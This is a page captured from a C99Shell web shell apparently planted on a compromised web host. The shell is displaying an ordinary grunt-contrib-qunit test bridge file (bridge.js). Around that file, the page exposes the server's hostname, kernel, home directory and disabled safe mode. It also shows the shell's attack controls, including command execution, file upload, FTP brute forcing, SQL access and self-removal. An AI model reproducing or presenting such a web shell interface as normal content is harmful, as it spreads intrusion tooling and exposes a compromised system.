!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache. PHP/5.3.29 

uname -a: Linux tardis23.nocplanet.net 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024
x86_64
 

 

Safe-mode: OFF (not secure)

/home/memoriacel/public_html/2018/panel/FileAPI-master/tests/grunt-task/phantomjs/   drwxr-xr-x
Free 986.37 GB of 1859.98 GB (53.03%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     bridge.js (1.45 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/*
 * grunt-contrib-qunit
 * http://gruntjs.com/
 *
 * Copyright (c) 2012 "Cowboy" Ben Alman, contributors
 * Licensed under the MIT license.
 */

/*global QUnit:true, alert:true*/

'use strict';


// Don't re-order tests.
QUnit.config.reorder = false;
// Run tests serially, not in parallel.
QUnit.config.autorun = false;

// Send messages to the parent PhantomJS process via alert! Good times!!
function sendMessage() {
  var args = [].slice.call(arguments);
  alert(JSON.stringify(args));
}

// These methods connect QUnit to PhantomJS.
QUnit.log(function(obj) {
  // What is this I don’t even
  if (obj.message === '[object Object], undefined:undefined') { return; }
  // Parse some stuff before sending it.
  var actual = QUnit.jsDump.parse(obj.actual);
  var expected = QUnit.jsDump.parse(obj.expected);
  // Send it.
  sendMessage('qunit.log', obj.result, actual, expected, obj.message, obj.source);
});

QUnit.testStart(function(obj) {
  sendMessage('qunit.testStart', obj.name);
});

QUnit.testDone(function(obj) {
  sendMessage('qunit.testDone', obj.name, obj.failed, obj.passed, obj.total);
});

QUnit.moduleStart(function(obj) {
  sendMessage('qunit.moduleStart', obj.name);
});

QUnit.moduleDone(function(obj) {
  sendMessage('qunit.moduleDone', obj.name, obj.failed, obj.passed, obj.total);
});

QUnit.begin(function() {
  sendMessage('qunit.begin');
});

QUnit.done(function(obj) {
  sendMessage('qunit.done', obj.failed, obj.passed, obj.total, obj.runtime);
});

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0049 ]--